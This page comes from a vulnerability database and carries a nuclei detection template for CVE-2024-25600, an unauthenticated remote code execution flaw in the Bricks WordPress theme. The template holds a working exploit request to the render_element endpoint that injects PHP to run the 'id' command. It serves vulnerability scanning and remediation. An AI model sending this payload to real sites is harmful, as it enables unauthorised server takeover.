Lucene search
K

Unauthenticated Remote Code Execution – Bricks <= 1.9.6

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 116 Views

Unauthenticated Remote Code Execution in Bricks <= 1.9.6, affecting 25,000 WordPress installation

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-25600
21 Feb 202400:27
githubexploit
GithubExploit
Exploit for CVE-2024-25600
31 Mar 202505:44
githubexploit
GithubExploit
Exploit for CVE-2024-25600
4 Jan 202610:19
githubexploit
GithubExploit
Exploit for CVE-2024-25600
10 Jul 202512:51
githubexploit
GithubExploit
Exploit for CVE-2024-25600
28 Nov 202508:25
githubexploit
GithubExploit
Exploit for CVE-2024-25600
6 Jun 202403:59
githubexploit
GithubExploit
Exploit for CVE-2024-25600
22 Feb 202410:53
githubexploit
GithubExploit
Exploit for CVE-2024-25600
20 Feb 202420:16
githubexploit
GithubExploit
Exploit for CVE-2024-25600
4 Apr 202517:35
githubexploit
GithubExploit
Exploit for CVE-2024-25600
18 Feb 202617:02
githubexploit
Rows per page
id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  impact: |
    Unauthenticated attackers can execute arbitrary code through the Bricks Builder theme, leading to complete site takeover and potential server compromise.
  remediation: |
    Update Bricks Builder theme to version 1.9.7 or later.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  classification:
    epss-score: 0.87452
    epss-percentile: 0.99733
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a0047304502202b9e808b837b5cb92c18b08541f4a94d241fe245681777f7ae4cfbc5629cb664022100c730f816be77d9b4cf080a9b1b96ae7fed85eba046531476cc2b36fda0a6de06:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.110
EPSS0.87452
SSVC
116